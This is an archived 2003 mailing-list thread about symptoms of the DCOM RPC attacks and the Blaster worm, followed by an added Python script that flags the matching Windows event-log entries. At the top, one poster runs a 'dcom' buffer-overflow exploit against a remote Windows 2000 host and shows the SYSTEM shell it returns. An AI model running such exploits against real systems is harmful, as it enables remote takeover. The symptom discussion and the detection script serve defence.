Amazing... This is all it takes. And I'm patched to date. Wonder when they'll fix that!

[root@orbital root]# ./dcom 4 xxx.xxx.xxx.xxx (IP munged for security purposes)
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Using return address of 0x77f92a9b
- Dropping to System Shell...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

-----Original Message-----
From: Ryan Lambert
Sent: Tuesday, August 12, 2003 8:36 AM
To: thin@xxxxxxxxxxxxx
Subject: [THIN] Re: OT: RPC symptoms

That's possible. I was detailing the remote attack without infection from the worm. Installer wasn't involved in my testing.

-----Original Message-----
From: Adam.Baum@xxxxxxxxxxxxxx [mailto:Adam.Baum@xxxxxxxxxxxxxx]
Sent: Tuesday, August 12, 2003 8:29 AM
To: thin@xxxxxxxxxxxxx
Subject: [THIN] Re: OT: RPC symptoms

Yup, got this too. Also found a bunch of failed MSI Installer events. Maybe Blaster tried to install, but was only partially successful.

adam

thin-bounce@freelists.org
08/12/2003 05:27 AM
To: <thin@xxxxxxxxxxxxx>
cc:
Subject: [THIN] Re: OT: RPC symptoms
Please respond to thin

Ron,

I have noticed three things in particular when running test attacks. You will see on the console that svchost.exe has crashed. It has a corresponding Event Log entry.

Event Type: Information
Event Source: DrWatson
Event Category: None
Event ID: 4097
Date: DATE
Time: TIME
User: N/A
Computer: COMPUTERNAME
Description:
The application, svchost.exe, generated an application error
The error occurred on DATE @ TIME.
The exception generated was c000001d at address 77E8367A (<nosymbols>)

Also this:

Event Type: Error
Event Source: EventSystem
Event Category: Event System
Event ID: 4097
Date: DATE
Time: TIME
User: N/A
Computer: COMPUTERNAME
Description:
The COM+ Event System detected a bad return code during its internal processing. HRESULT was 800706BF from line 42 of .\eventsystemobj.cpp.
Please contact Microsoft Product Support Services to report this error.

********************************************************
This Week's Sponsor: RES PowerFuse, The Management Framework for Windows
Eliminate Multiple Tools, Multiple Support Channels and Multiple Costs
Manage, Control, and Secure an Entire Windows environment with Ease, including Real-time Reporting and Documenting Components
Validate a Meaningful ROI on All of your IT Investments with RES PowerFuse.
http://www.respowerfuse.com/
**********************************************************
Useful Thin Client Computing Links are available at: http://thethin.net/links.cfm
For Archives, to Unsubscribe, Subscribe or set Digest or Vacation mode use the below link: http://thethin.net/citrixlist.cfm
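The two Event Log entries quoted in the thread can be matched mechanically when triaging a fleet of servers. What follows is an added example, not code from the thread or any of its authors: a Python script that parses a constructed text export in the same "Event Source / Event ID / Description" layout and flags the DrWatson report for svchost.exe and the COM+ Event System entry with HRESULT 800706BF. The computer names, the record layout and the third (non-matching) record are constructed.

```python
import re

# Constructed sample in the "Event Source / Event ID / Description" export
# layout quoted in the thread; records are separated by a blank line.
SAMPLE_EXPORT = """\
Event Source: DrWatson
Event ID: 4097
Computer: SRV01
Description:
The application, svchost.exe, generated an application error
The exception generated was c000001d at address 77E8367A (<nosymbols>)

Event Source: EventSystem
Event ID: 4097
Computer: SRV01
Description:
The COM+ Event System detected a bad return code during its internal processing.
HRESULT was 800706BF from line 42 of .\\eventsystemobj.cpp.

Event Source: DrWatson
Event ID: 4097
Computer: SRV02
Description:
The application, notepad.exe, generated an application error
"""

FIELD_RE = re.compile(r"^(Event Source|Event ID|Computer): (.*)$")

def parse_records(text):
    """Split a text export into dicts of header fields plus the Description body."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        header, _, desc = block.partition("Description:\n")
        rec = dict(m.groups() for m in map(FIELD_RE.match, header.splitlines()) if m)
        rec["Description"] = desc
        records.append(rec)
    return records

def rpc_symptoms(text):
    """Flag records matching the two symptoms the thread attributes to RPC attacks:
    a DrWatson report for svchost.exe and a COM+ Event System HRESULT 800706BF."""
    hits = []
    for r in parse_records(text):
        src, eid, desc = r.get("Event Source"), r.get("Event ID"), r["Description"]
        if src == "DrWatson" and eid == "4097" and "svchost.exe" in desc:
            hits.append((r.get("Computer"), "svchost.exe crash"))
        elif src == "EventSystem" and eid == "4097" and "800706BF" in desc:
            hits.append((r.get("Computer"), "COM+ Event System HRESULT 800706BF"))
    return hits
```

A DrWatson entry for a process other than svchost.exe (the third record) is deliberately not flagged, so only the combination of source, ID and description text counts as a hit.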